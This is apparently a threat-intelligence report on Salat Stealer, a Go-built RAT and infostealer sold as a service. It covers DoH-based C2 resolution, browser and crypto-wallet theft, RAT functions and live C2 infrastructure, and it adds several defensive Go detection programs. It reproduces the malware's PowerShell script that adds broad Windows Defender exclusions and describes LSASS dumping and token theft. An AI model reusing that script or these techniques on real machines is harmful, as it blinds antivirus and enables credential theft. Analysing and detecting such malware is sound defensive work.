Salat Stealer: Go-Compiled RAT with DNS-over-HTTPS C2 Resolution, 62 Crypto Wallet Extensions, and a Live MaaS Panel on Russian Infrastructure
TL;DR: Salat Stealer is a UPX-packed Go binary that combines a full-featured RAT (remote shell, keylogger, screen/webcam/mic capture, SOCKS5 proxy) with an aggressive infostealer targeting 30+ browsers, 24+ crypto wallets, and 62 Chrome extension IDs. The C2 domain is encrypted in the binary and resolved at runtime via DNS-over-HTTPS, defeating traditional DNS blocklists. Infrastructure probing revealed a live MaaS (Malware-as-a-Service) operation run by "NyashTeam" across Cloudflare-fronted domains and Beget LLC backends in Saint Petersburg, with a previously undocumented domain (sa1at[.]ru) discovered through TLS certificate SAN enumeration.
Campaign Overview
SalatStealer is not a standalone tool -- it is the payload arm of a MaaS platform operated under the "NyashTeam" / "WebRat" brand. The operator portal at nyash[.]team advertises itself as the "OFFICIAL WebRat RESEL" (reseller), with sales and support conducted through two Telegram bots. The C2 infrastructure uses a tiered architecture: Cloudflare-fronted domains for data exfiltration, direct-IP Beget backends for API and panel operations, and a now-offline FirstVDS admin panel that was likely relocated after researcher attention.
Two samples were analyzed, combining static analysis of the unpacked PE with a live infrastructure probe of all known C2 domains.
Sample Overview
| Property | Sample 1 (Panel Probe) | Sample 2 (Binary Analysis) |
|---|---|---|
| SHA-256 | ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756 | 30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2 |
| MD5 | 62d42b8788f958885cfd34428d29d7e1 | -- |
| SHA-1 | 3a0c59c4b26e9fdff15170f16d6317693b87ca5c | -- |
| Size | 3.5 MB | 3.3 MB packed / 11.7 MB unpacked |
| Format | PE32 (GUI), Intel 80386 | PE32 (GUI), Intel 80386, UPX |
| Compiler | Go | Go 1.18+ (GOOS=windows, 32-bit) |
| UPX Ratio | -- | 28.25% |
| Sandbox Score | 9/10 (Triage) | -- |
| Tags | stealer, spyware, adware, credential_access, upx | -- |
The bc.exe filename observed in a second Triage submission suggests the binary is distributed under different names to affiliates. System language and location discovery TTPs in that submission indicate geo-targeting or geo-fencing behavior.
C2 Architecture: DNS-over-HTTPS Domain Resolution
The most notable evasion technique is the C2 resolution mechanism. SalatStealer does not store its C2 domain in plaintext. Instead, the domain is encrypted via a custom main.dec function and resolved at runtime through DNS-over-HTTPS (DoH), bypassing traditional DNS monitoring and sinkholing entirely.
The resolution chain works as follows:
1. main.dec() decrypts embedded C2 domain from .rdata blob
2. main.getBestMethod() tests DoH resolver availability (probes google.com)
3. main.getEp() resolves decrypted domain via selected DoH provider
4. main.initConnection() establishes WebSocket session to resolved IP
DoH resolver fallback chain:
https://cloudflare-dns.com/dns-query?name=<c2_domain>
https://dns.google/resolve?name=<c2_domain>
https://1.1.1.1/dns-query?name=<c2_domain>
Fallback: 127.0.0.1:53 (local resolver)
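The resolution chain above is only observable on the wire as HTTPS requests to the three resolver hosts, so the practical detection point is a TLS-inspecting proxy log. The following Go program is an added example (not code from the report or from the malware) that flags DoH lookups to those resolvers, recovers the queried name from the `?name=` parameter, and parses the JSON answer format used by `dns.google/resolve` (and by Cloudflare's `application/dns-json` variant) to see which IP a lookup returned. The proxy log URLs, the `c2.example.invalid` domain and the response body are all constructed for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/url"
	"strings"
)

// dohResolvers lists the DoH endpoints named in the report. Requests to
// these hosts carrying a "name" query parameter are the observable to flag.
var dohResolvers = map[string]bool{
	"cloudflare-dns.com": true,
	"dns.google":         true,
	"1.1.1.1":            true,
}

// DoHQuery is one flagged DoH lookup recovered from a proxy log.
type DoHQuery struct {
	Resolver string
	Name     string // queried domain, trailing dot removed, lower-cased
}

// ClassifyDoHRequest reports whether rawURL is a DoH lookup to one of the
// listed resolvers and, if so, which name it asks for. Only TLS-inspected
// proxy logs expose the full URL; otherwise only SNI/destination is visible.
func ClassifyDoHRequest(rawURL string) (DoHQuery, bool) {
	u, err := url.Parse(rawURL)
	if err != nil || u.Scheme != "https" {
		return DoHQuery{}, false
	}
	host := strings.ToLower(u.Hostname())
	if !dohResolvers[host] {
		return DoHQuery{}, false
	}
	// Both the Google JSON API (/resolve) and the dns-json variant of
	// /dns-query carry the queried name in ?name=.
	name := u.Query().Get("name")
	if name == "" {
		return DoHQuery{}, false
	}
	return DoHQuery{Resolver: host, Name: strings.TrimSuffix(strings.ToLower(name), ".")}, true
}

// dohJSONResponse mirrors the fields of the JSON answer format used by
// dns.google/resolve and Cloudflare's application/dns-json.
type dohJSONResponse struct {
	Status int `json:"Status"`
	Answer []struct {
		Name string `json:"name"`
		Type int    `json:"type"`
		Data string `json:"data"`
	} `json:"Answer"`
}

// ExtractDoHAnswers returns the A (type 1) and AAAA (type 28) record data
// from a captured DoH JSON response body, i.e. the IPs the name resolved to.
func ExtractDoHAnswers(body []byte) ([]string, error) {
	var resp dohJSONResponse
	if err := json.Unmarshal(body, &resp); err != nil {
		return nil, err
	}
	if resp.Status != 0 {
		return nil, fmt.Errorf("DoH status %d (not NOERROR)", resp.Status)
	}
	var ips []string
	for _, a := range resp.Answer {
		if a.Type == 1 || a.Type == 28 {
			ips = append(ips, a.Data)
		}
	}
	return ips, nil
}

// TriageProxyLog flags DoH lookups whose queried name is on the IOC list and
// returns "resolver -> name" strings for each hit.
func TriageProxyLog(urls []string, iocDomains map[string]bool) []string {
	var hits []string
	for _, raw := range urls {
		q, ok := ClassifyDoHRequest(raw)
		if ok && iocDomains[q.Name] {
			hits = append(hits, q.Resolver+" -> "+q.Name)
		}
	}
	return hits
}

func main() {
	// Constructed sample URLs resembling TLS-inspected proxy log entries;
	// c2.example.invalid stands in for the decrypted C2 domain.
	sample := []string{
		"https://cloudflare-dns.com/dns-query?name=c2.example.invalid",
		"https://dns.google/resolve?name=c2.example.invalid&type=A",
		"https://www.google.com/",                    // the availability probe, not a lookup
		"https://dns.google/resolve?name=github.com", // benign DoH lookup
	}
	iocs := map[string]bool{"c2.example.invalid": true}
	for _, h := range TriageProxyLog(sample, iocs) {
		fmt.Println("DoH lookup of IOC domain:", h)
	}
	// Constructed response body in the dns.google JSON format.
	body := []byte(`{"Status":0,"Answer":[{"name":"c2.example.invalid.","type":1,"TTL":300,"data":"203.0.113.10"}]}`)
	ips, _ := ExtractDoHAnswers(body)
	fmt.Println("resolved to:", ips)
}
```

Without TLS inspection the same logic degrades to "unexpected client talking to a public DoH resolver at all", which is still a useful signal on hosts where the browser and OS are configured to use the corporate resolver.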
The key functions involved:
| Function | Purpose |
|---|---|
| main.getEp | Resolve C2 endpoint via DoH |
| main.initConnection | Establish WebSocket connection |
| main.changeEndpoint | Dynamic endpoint rotation during session |
| main.c2Server | Global variable holding current C2 address |
| main.dec / dec.func1 | Custom decryption for embedded config |
| main.getBestMethod | Test DoH provider availability |
The transport layer uses gorilla/websocket over HTTPS with QUIC/HTTP3 support (via quic-go). The C2 path is /saat/ with a WebSocket session protocol (wsSess) for bidirectional command execution.
WebSocket command protocol (extracted from strings):
postOpen - Initial connection handshake
/config - Retrieve configuration from C2
_gateway - Connection management
shutdown - Terminate connection
taskkill - Remote process kill
ConnectCache - Cache connection state
An anti-analysis marker was embedded as the build identifier: dQw4w9WgXcQ -- a YouTube rickroll video ID.
Encrypted Configuration
A 3,268-byte base64 blob at .rdata offset 0x0059ae77 contains an XOR/AES-encrypted configuration decrypted at runtime by main.dec. This blob holds connection parameters, affiliate configuration, and targeting rules.
A separate 1,984-byte blob contains 62 concatenated Chrome extension IDs (32 characters each) for cryptocurrency wallet targeting. Partially identified extensions:
| Extension ID Prefix | Wallet |
|---|---|
nkbihfbeogaeaoe... | MetaMask |
ejbalbakoplchlg... | MetaMask-related |
ibnejdfjmmkpcnlp... | Phantom (Solana) |
App-Bound Encryption (APPB) Key IDs for Chromium cookie/credential decryption:
D877F783D5D3EF8C (with \configs and \maps variants)
A7FDF864FBC10B77 (with \configs and \maps variants)
F8806DD0C461824F (with \configs and \maps variants)
C2B05980D9127787 (with \configs and \maps variants)
0CA814316818D8F6 (with \configs and \maps variants)
Decoded APPB key identifier: V0VCUl9BSU40TlBLU01JMTY= -> WEBR_AIN4NPKSMI16
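Chrome extension IDs are 32 characters drawn from the letters a-p, which is why a 1,984-byte blob splits exactly into the 62 IDs mentioned above. The Go program below is an added example (not the report's or the malware's code) of how an analyst would carve such a blob: it validates the length and alphabet so a wrong offset is caught immediately, labels each ID against the prefixes published in the table, and decodes the base64 APPB key identifier to confirm the reading given above. The blob itself is constructed by padding the published prefixes with the letter `a` to full length plus one made-up unknown ID; only the prefixes come from the report.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// Chrome extension IDs are 32 characters from a-p (a hex digest re-encoded
// with letters), so a blob of concatenated IDs must be a multiple of 32 bytes.
const extIDLen = 32

var extIDPattern = regexp.MustCompile(`^[a-p]{32}$`)

// knownWalletPrefixes holds the partially recovered prefixes from the report;
// matching is by prefix because only the prefixes are published there.
var knownWalletPrefixes = map[string]string{
	"nkbihfbeogaeaoe":  "MetaMask",
	"ejbalbakoplchlg":  "MetaMask-related",
	"ibnejdfjmmkpcnlp": "Phantom (Solana)",
}

// SplitExtensionBlob splits a concatenated extension-ID blob into IDs,
// rejecting blobs whose length is not a multiple of 32 or whose chunks are
// not valid extension IDs (either would indicate a wrong offset or encoding).
func SplitExtensionBlob(blob string) ([]string, error) {
	if len(blob)%extIDLen != 0 {
		return nil, fmt.Errorf("blob length %d is not a multiple of %d", len(blob), extIDLen)
	}
	ids := make([]string, 0, len(blob)/extIDLen)
	for i := 0; i < len(blob); i += extIDLen {
		id := blob[i : i+extIDLen]
		if !extIDPattern.MatchString(id) {
			return nil, fmt.Errorf("chunk %d (%q) is not a Chrome extension ID", i/extIDLen, id)
		}
		ids = append(ids, id)
	}
	return ids, nil
}

// LabelWallets maps each ID to a wallet name where a known prefix matches and
// to "unknown" otherwise, so the still-unidentified targets are visible.
func LabelWallets(ids []string) map[string]string {
	labels := make(map[string]string, len(ids))
	for _, id := range ids {
		labels[id] = "unknown"
		for prefix, name := range knownWalletPrefixes {
			if strings.HasPrefix(id, prefix) {
				labels[id] = name
				break
			}
		}
	}
	return labels
}

// DecodeKeyIdentifier decodes a base64 identifier such as the APPB key ID
// recovered from the binary and returns it as text.
func DecodeKeyIdentifier(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	return string(raw), nil
}

// ConstructedBlob is a stand-in for the 1,984-byte blob: the published
// prefixes padded with 'a' to 32 characters, plus one made-up unknown ID.
func ConstructedBlob() string {
	ids := []string{
		"nkbihfbeogaeaoe" + strings.Repeat("a", 17),
		"ejbalbakoplchlg" + strings.Repeat("a", 17),
		"ibnejdfjmmkpcnlp" + strings.Repeat("a", 16),
		strings.Repeat("p", 32), // constructed, matches no known prefix
	}
	return strings.Join(ids, "")
}

func main() {
	ids, err := SplitExtensionBlob(ConstructedBlob())
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for _, id := range ids {
		fmt.Printf("%s  %s\n", id, LabelWallets(ids)[id])
	}
	s, _ := DecodeKeyIdentifier("V0VCUl9BSU40TlBLU01JMTY=")
	fmt.Println("APPB key identifier:", s)
}
```

Running the same splitter over the real blob and diffing the 62 IDs against a wallet-extension allowlist is the quickest way to complete the identification the table leaves partial.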
Windows Defender Evasion
An embedded base64-encoded PowerShell script adds broad Defender exclusions at runtime:
```powershell
try {
    if (Get-Command Add-MpPreference -ErrorAction SilentlyContinue) {
        $ProgramFiles = [System.Environment]::GetFolderPath("ProgramFilesX86")
        $updpath = $ProgramFiles -replace " \(x86\)", ""
        Add-MpPreference -ExclusionPath $updpath
        $ProgramFilesX86 = [System.Environment]::GetFolderPath("ProgramFilesX86")
        if (Test-Path $ProgramFilesX86) {
            Add-MpPreference -ExclusionPath $ProgramFilesX86
        }
        $AppData = [System.Environment]::GetFolderPath("ApplicationData")
        Add-MpPreference -ExclusionPath $AppData
        $LocalAppData = [System.Environment]::GetFolderPath("LocalApplicationData")
        Add-MpPreference -ExclusionPath $LocalAppData
    }
}
catch {}
```
This blankets C:\Program Files, C:\Program Files (x86), %AppData%, and %LocalAppData% -- effectively blinding Defender to anything dropped in standard application directories.
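Each `Add-MpPreference -ExclusionPath` call leaves a trace: Defender writes Event ID 5007 ("configuration has changed") to the Microsoft-Windows-Windows Defender/Operational log, with the new exclusion shown as a registry value under `HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths`. The Go program below is an added example (not from the report) of the detection a SOC would run over those events: it pulls the excluded path out of the message and flags exclusions that cover an entire profile or Program Files root rather than a single product directory. The event messages are constructed to resemble 5007 text with the surrounding boilerplate abbreviated; the user name and vendor path are made up.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// exclusionKeyPrefix is the registry key under which Defender stores path
// exclusions; Event ID 5007 reports a change as "<key>\<path> = 0x0".
const exclusionKeyPrefix = `HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\`

var newValueRe = regexp.MustCompile(`(?m)^\s*New value:\s*(.+?)\s*=\s*0x[0-9A-Fa-f]+\s*$`)

// ExtractExclusionPath returns the path added by a 5007 configuration-change
// message, or "" if the message is not a path-exclusion change.
func ExtractExclusionPath(msg string) string {
	m := newValueRe.FindStringSubmatch(msg)
	if m == nil {
		return ""
	}
	val := m[1]
	if !strings.HasPrefix(strings.ToLower(val), strings.ToLower(exclusionKeyPrefix)) {
		return ""
	}
	return val[len(exclusionKeyPrefix):]
}

// broadRoots are directory roots where an exclusion covers far more than one
// product; they correspond to what the script above adds.
var broadRoots = []string{
	`\Program Files`, // also matched with the " (x86)" suffix
	`\AppData\Roaming`,
	`\AppData\Local`,
	`%ProgramFiles%`, `%AppData%`, `%LocalAppData%`,
}

// IsBroadExclusion reports whether an exclusion path is exactly one of the
// broad roots (a subdirectory such as C:\Program Files\Vendor\App is not flagged).
func IsBroadExclusion(path string) bool {
	p := strings.TrimRight(strings.ToLower(path), `\`)
	for _, root := range broadRoots {
		r := strings.ToLower(root)
		if strings.HasSuffix(p, r) || strings.HasSuffix(p, r+" (x86)") {
			return true
		}
	}
	return false
}

// TriageDefenderEvents runs both checks over event messages and returns the
// broad exclusions found, in the order they occurred.
func TriageDefenderEvents(messages []string) []string {
	var flagged []string
	for _, msg := range messages {
		if p := ExtractExclusionPath(msg); p != "" && IsBroadExclusion(p) {
			flagged = append(flagged, p)
		}
	}
	return flagged
}

// SampleEvents returns constructed messages in the shape of Defender
// Operational Event ID 5007 (boilerplate abbreviated, user "alice" made up).
func SampleEvents() []string {
	mk := func(path string) string {
		return "Configuration has changed.\n Old value: \n New value: " + exclusionKeyPrefix + path + " = 0x0"
	}
	return []string{
		mk(`C:\Program Files`),
		mk(`C:\Program Files (x86)`),
		mk(`C:\Users\alice\AppData\Roaming`),
		mk(`C:\Users\alice\AppData\Local`),
		mk(`C:\Program Files\Vendor\App`), // a narrow, plausibly legitimate exclusion
		"Configuration has changed.\n Old value: \n New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1",
	}
}

func main() {
	for _, p := range TriageDefenderEvents(SampleEvents()) {
		fmt.Println("broad Defender exclusion added:", p)
	}
}
```

Pairing this with a baseline of exclusions your software deployment legitimately creates keeps the alert volume manageable; the four roots above should essentially never appear in that baseline.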
Credential and Data Theft
Chromium Browsers (25+ targets)
Chrome, Chrome (x86), Brave, Edge, Opera, Yandex, Vivaldi, Chromium, CentBrowser, Thorium, Iridium, Amigo, Torch, Orbitum, K-Melon, Slimjet, Elements Browser, Epic Privacy Browser, Chedot, Kometa, liebao, Maxthon3, QIP Surf, UR Browser, Sputnik, DCBrowser.
Data exfiltrated: Cookies, Login Data, Web Data (autofill), Local State, authentication tokens. Decryption via DPAPI and App-Bound Encryption key extraction through COM elevation service abuse (IElevator, IElevatorBrave, IElevatorEdge).
Gecko/Firefox Browsers (7+ targets)
Firefox, Waterfox, K-Meleon, Cyberfox, BlackHaw, SeaMonkey, IceDragon, Pale Moon, Thunderbird.
Data exfiltrated: logins.json, key4.db, cookies, nssPrivate. Decryption via NSS PBE (PKCS#5), DES3, AES-128-CBC. Credential extraction uses SELECT a11, a102 against the NSS private key database.
Cryptocurrency Wallets (24+ applications)
AtomicWallet, Jaxx Liberty, TerraStation, Trust Wallet, Coinomi, MetaMask, MetaMask2, TonKeeper, SuiWallet, MyTonWallet, KardiaChain, Temple, Tezos, Tokenpocket, Bytecoin, Ethereum (keystore), Electrum, MyMonero, Coinbase, Crocobit, Starcoin, Maiar, DEFI, Liquality, Harmony.
Additionally, 62 Chrome extension IDs are targeted for wallet clipper/stealing operations. Clipboard monitoring detects Bitcoin addresses in two formats (bc1 bech32 and legacy) via getBC1/getBC2 functions, and also monitors for tg:// URLs.
Messaging and Gaming
- Telegram Desktop: tdata folder exfiltration (both standard and UWP variants)
- Discord: Token extraction
- Steam: SteamTokens.txt, SteamPath, config.vdf parsing
RAT Capabilities
Beyond info-stealing, SalatStealer is a full-featured RAT:
| Capability | Functions | Method |
|---|---|---|
| Remote Shell | startShell, stopShell, shellCommand, sendShellCommand | cmd.exe |
| Screen Capture | screenStream, sendScreen, getScreen | salat/screenshot package |
| Webcam | ffwcam | ffmpeg |
| Desktop Recording | ffdesktop, sepDesktop | ffmpeg |
| Microphone | ffwmic, getMics | ffmpeg |
| Keylogger | startKeylogger, stopKeylogger, runKeylogger, klog | SetWinEventHook, keyPressCallback, windowChangeCallback |
| File Operations | downloadFile, downloadFileUnsafe, zipFiles, unzip | Direct download |
| Process Control | taskkill, findProcessByName, suspendProcessThreads | Windows API |
| SOCKS5 Proxy | socks5Conn, p2pSocks, proxySocks, forward | P2P tunneling |
| Task Scheduling | doTask, newTask, updTaskStatus | Windows Task Scheduler |
| Persistence | staticinstall | Registry Run key (SOFTWARE\Microsoft\Windows\CurrentVersion\Run) |
| Self-Destruct | selfDelete, Suicide | Anti-forensics |
Privilege Escalation
SalatStealer implements multiple privilege escalation paths:
- LSASS targeting: findLsassProcess, impersonateSystem, readProcFile -- direct LSASS memory reading for credential dumping
- Token manipulation: DuplicateUserTokenFromSessionID, getSystemToken -- token theft from high-privilege processes
- Privilege adjustment: RtlAdjustPrivilege, enablePrivilege -- enabling SeDebugPrivilege and similar
- COM elevation abuse: IElevator, IElevatorBrave, IElevatorEdge -- exploiting browser elevation COM services to extract App-Bound Encryption keys
- Process unlocking: unlockProcs via Restart Manager API (RmGetList) -- killing processes that hold file locks
Target processes for token impersonation:
explorer.exe, svchost.exe, snss.exe, csrss.exe, services.exe,
lsass.exe, taskhostg.exe, taskhost.exe, audiodg.exe, wininit.exe,
spoolsv.exe, dwm.exe
Infrastructure: A Three-Tier MaaS Operation
Live probing on 2026-03-06 revealed a tiered infrastructure with clear separation between public-facing C2 domains, backend servers, and the admin panel.
Tier 1: Cloudflare-Fronted C2 Domains
| Domain | Status | Purpose |
|---|---|---|
| salator[.]es | FLAGGED (Cloudflare phishing interstitial, HTTP 403) | Data exfiltration |
| websalat[.]top | FLAGGED (Cloudflare phishing interstitial, HTTP 403) | Data exfiltration |
| salat[.]cn | ACTIVE (HTTP 404, Access-Control-Allow-Origin: *) | Data exfiltration -- unflagged |
| nyash[.]team | ACTIVE | Operator/reseller portal |
Cloudflare has flagged two of four C2 domains, but salat[.]cn remains active and unflagged -- likely the current primary exfiltration endpoint. The Access-Control-Allow-Origin: * header on salat[.]cn confirms it is an active API endpoint.
Tier 2: Direct Beget Backends
| IP | Server | Domains Served | Status |
|---|---|---|---|
| 85.198.98.75 | Angie (Debian, OpenSSH 9.2p1) | wrat[.]in, sa1at[.]ru | LIVE |
| 217.26.28.234 | Angie | Backend API | LIVE |
| 109.172.46.120 | nginx 1.29.5 | Former wrat[.]in host | Decommissioned |
All backend servers are hosted on Beget LLC (AS198610) shared hosting in Saint Petersburg, running Angie -- a Russian fork of nginx (https://angie.software/). The operator rotates IPs within the same ASN while maintaining Beget as the sole backend provider.
Tier 3: Admin Panel (Offline)
The original admin panel at 62.109.0.189 (FirstVDS / JSC IOT, AS29182, Moscow) is completely unreachable -- no open ports are detected on Shodan, and all connection attempts time out. Reverse DNS resolves to server.fvds.ru. The operator likely relocated this panel after researcher attention.
New Domain Discovery: sa1at[.]ru
TLS certificate SAN enumeration on wrat[.]in revealed a previously undocumented domain:
Subject: CN = wrat.in
SAN: DNS:sa1at.ru, DNS:wrat.in
Issuer: Let's Encrypt E8
Valid: 2026-01-22 to 2026-04-22
sa1at[.]ru is a leet-speak alias for "salat" (1=l), resolving to the same Beget IP (85.198.98.75) and running Angie. CT log history shows the domain has been active since December 2024, making it the oldest domain in the infrastructure. It was not present in any prior IOC publications.
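The pivot described here generalizes: index every certificate you collect (from TLS handshakes or CT logs) by each name it covers, and any domain that shares a certificate with a known indicator falls out of the index. The Go program below is an added example of that indexing (not the report's tooling) built on the standard library's `crypto/x509`. Because the real certificates are not reproduced on the page, it generates throwaway self-signed certificates for constructed names (`primary.example.invalid` sharing a SAN list with `alias.example.invalid`, and an unrelated wildcard for `shop.example.test`); with real input, the DER bytes would come straight from the handshake or the CT entry.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"sort"
	"strings"
	"time"
)

// CertNames returns every DNS name a certificate covers: the CN (when it
// looks like a hostname) plus all SAN dNSName entries, de-duplicated,
// lower-cased and sorted.
func CertNames(cert *x509.Certificate) []string {
	seen := map[string]bool{}
	var names []string
	add := func(n string) {
		n = strings.ToLower(strings.TrimSuffix(n, "."))
		if n != "" && !seen[n] {
			seen[n] = true
			names = append(names, n)
		}
	}
	if cn := cert.Subject.CommonName; strings.Contains(cn, ".") && !strings.Contains(cn, " ") {
		add(cn)
	}
	for _, d := range cert.DNSNames {
		add(d)
	}
	sort.Strings(names)
	return names
}

// PivotBySAN indexes certificates by every name they cover, so that looking
// up one known domain returns the other domains that share a certificate with it.
func PivotBySAN(certs []*x509.Certificate) map[string][]string {
	index := map[string]map[string]bool{}
	for _, c := range certs {
		names := CertNames(c)
		for _, n := range names {
			if index[n] == nil {
				index[n] = map[string]bool{}
			}
			for _, other := range names {
				if other != n {
					index[n][other] = true
				}
			}
		}
	}
	out := map[string][]string{}
	for n, set := range index {
		for other := range set {
			out[n] = append(out[n], other)
		}
		sort.Strings(out[n])
	}
	return out
}

// selfSignedCert builds a throwaway certificate for the constructed names so
// the example runs offline; real input would be DER from a handshake or CT log.
func selfSignedCert(cn string, sans []string) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: cn},
		DNSNames:     sans,
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(90 * 24 * time.Hour),
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// PivotDemo recreates the report's pivot with constructed names: one cert
// whose SAN list joins two domains, one unrelated wildcard cert.
func PivotDemo() (map[string][]string, error) {
	a, err := selfSignedCert("primary.example.invalid", []string{"alias.example.invalid", "primary.example.invalid"})
	if err != nil {
		return nil, err
	}
	b, err := selfSignedCert("shop.example.test", []string{"*.shop.example.test"})
	if err != nil {
		return nil, err
	}
	return PivotBySAN([]*x509.Certificate{a, b}), nil
}

func main() {
	pivot, err := PivotDemo()
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for name, linked := range pivot {
		fmt.Printf("%s shares a certificate with %v\n", name, linked)
	}
}
```

Querying the index for a known indicator such as `wrat.in` is what surfaces a sibling like `sa1at.ru`; re-running it as new CT entries arrive turns the one-off pivot into a standing watch for the operator's next domain.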
URL Path Structure: Affiliate Model
urlscan.io submissions reveal a consistent C2 path pattern across all domains:
salator.es/sa1at/y/
salator.es/sa1at/l/
salator.es/sa1at/2or/
websalat.top/sa1at/008
wrat.in/sa1at/8q
wrat.in/sa1at/v
wrat.in/login/
The /sa1at/ path prefix is the data exfiltration endpoint. The suffixes (y, l, 2or, 008, 8q, v) are customer/affiliate IDs in the MaaS panel -- each suffix routes stolen data to a different buyer's panel view. The /login/ path confirms an admin panel interface.
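For hunting in proxy or web-server logs, the path scheme above is the stable part: the hosts rotate, the `/sa1at/<suffix>` shape does not. The Go program below is an added example (not the report's code) that classifies observed URLs into the three path types described here and aggregates affiliate suffixes per host, which is the view needed to notice a new suffix or a new host reusing a known suffix. The observed URLs are the seven listed above; the scheme-less form is accepted because urlscan.io-style exports are frequently logged that way.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"sort"
	"strings"
)

// C2Path describes how an observed URL maps onto the path scheme above.
type C2Path struct {
	Host      string
	Kind      string // "exfil", "ws", "login" or "" when unrecognised
	Affiliate string // affiliate suffix for "exfil" paths
}

var exfilRe = regexp.MustCompile(`^/sa1at/([A-Za-z0-9]+)/?$`)

// ClassifyC2URL recognises the /sa1at/<affiliate>, /saat/ and /login/ paths.
// URLs without a scheme are treated as https so that bare "host/path" log
// entries parse with the host in the right place.
func ClassifyC2URL(raw string) (C2Path, error) {
	if !strings.Contains(raw, "://") {
		raw = "https://" + raw
	}
	u, err := url.Parse(raw)
	if err != nil {
		return C2Path{}, err
	}
	res := C2Path{Host: strings.ToLower(u.Hostname())}
	switch {
	case exfilRe.MatchString(u.Path):
		res.Kind = "exfil"
		res.Affiliate = exfilRe.FindStringSubmatch(u.Path)[1]
	case strings.HasPrefix(u.Path, "/saat/"):
		res.Kind = "ws"
	case u.Path == "/login/" || u.Path == "/login":
		res.Kind = "login"
	}
	return res, nil
}

// AffiliatesByHost aggregates observed affiliate suffixes per host, sorted,
// so one customer's traffic can be told from another's across domains.
func AffiliatesByHost(urls []string) map[string][]string {
	seen := map[string]map[string]bool{}
	for _, raw := range urls {
		p, err := ClassifyC2URL(raw)
		if err != nil || p.Kind != "exfil" {
			continue
		}
		if seen[p.Host] == nil {
			seen[p.Host] = map[string]bool{}
		}
		seen[p.Host][p.Affiliate] = true
	}
	out := map[string][]string{}
	for host, ids := range seen {
		for id := range ids {
			out[host] = append(out[host], id)
		}
		sort.Strings(out[host])
	}
	return out
}

// ObservedURLs returns the urlscan.io submissions listed in the report.
func ObservedURLs() []string {
	return []string{
		"salator.es/sa1at/y/",
		"salator.es/sa1at/l/",
		"salator.es/sa1at/2or/",
		"websalat.top/sa1at/008",
		"wrat.in/sa1at/8q",
		"wrat.in/sa1at/v",
		"wrat.in/login/",
	}
}

func main() {
	for _, raw := range ObservedURLs() {
		p, _ := ClassifyC2URL(raw)
		fmt.Printf("%-26s host=%-14s kind=%-6s affiliate=%s\n", raw, p.Host, p.Kind, p.Affiliate)
	}
	for host, ids := range AffiliatesByHost(ObservedURLs()) {
		fmt.Printf("%s affiliates: %v\n", host, ids)
	}
}
```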
NyashTeam Operator Portal
nyash[.]team is the public-facing MaaS storefront branded as the "OFFICIAL WebRat RESEL" (reseller). Communications and sales are conducted via two Telegram bots:
- @nyashsupbot -- support
- @nyash_team_bot -- sales and comms
The site includes an "Оферта" page (Russian terms of service). 32 urlscan.io submissions indicate heavy researcher monitoring.
Certificate Intelligence
| Domain | Issuer | First Cert (CT Log) | SANs |
|---|---|---|---|
| sa1at[.]ru | Let's Encrypt E8 | 2024-12-20 | wrat.in, sa1at.ru |
| salat[.]cn | Google Trust WE1 | 2024-09-17 | *.salat.cn |
| websalat[.]top | Google Trust WE1 | 2025-06-29 | *.websalat.top |
| wrat[.]in | Let's Encrypt E8 | 2025-08-28 | wrat.in, sa1at.ru |
| nyash[.]team | Google Trust WE1 | 2025-08-29 | *.nyash.team |
| salator[.]es | Google Trust WE1 | 2025-10-29 | *.salator.es |
Dual-issuer strategy: Cloudflare-fronted domains receive Google Trust Services + Sectigo (automated by Cloudflare), while direct-IP domains use Let's Encrypt (certbot). The shared cert between wrat[.]in and sa1at[.]ru was the key pivot for the new domain discovery.
Go Module Dependencies
The binary links against the following Go modules, revealing implementation details:
| Module | Purpose |
|---|---|
| github.com/gorilla/websocket | WebSocket C2 communication |
| github.com/quic-go/quic-go | QUIC/HTTP3 protocol support |
| github.com/ncruces/go-sqlite3 | Browser SQLite database parsing |
| github.com/tetratelabs/wazero | WebAssembly runtime (SQLite WASM) |
| github.com/StackExchange/wmi | WMI queries for system info |
| github.com/go-ole/go-ole | COM/OLE automation (IElevator abuse) |
| github.com/capnspacehook/taskmaster | Windows Task Scheduler persistence |
| github.com/andygrunwald/vdf | Valve Data Format (Steam config parsing) |
| github.com/buger/jsonparser | JSON parsing (C2 comms, DoH responses) |
| github.com/lxn/win | Win32 API bindings |
| github.com/nfnt/resize | Image resizing (screenshot optimization) |
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| Modify Registry | T1112 | Registry Run key persistence, Defender exclusion bypass |
| Virtualization/Sandbox Evasion | T1497 | VirtualBox/VMware registry key checks, ACPI enumeration |
| Credentials in Files | T1552.001 | Browser profile data, wallet files |
| Credentials from Web Browsers | T1555.003 | DPAPI, NSS PBE, APPB decryption |
| Query Registry | T1012 | VM detection, system configuration |
| System Information Discovery | T1082 | Win32_Processor, Win32_LogonSession, HWID |
| Browser Information Discovery | T1217 | 30+ browser data directories |
| Data from Local System | T1005 | Wallet files, Telegram tdata, Steam configs |
| System Location Discovery | T1614 | Geo-targeting/geo-fencing |
| System Language Discovery | T1614.001 | Language-based targeting |
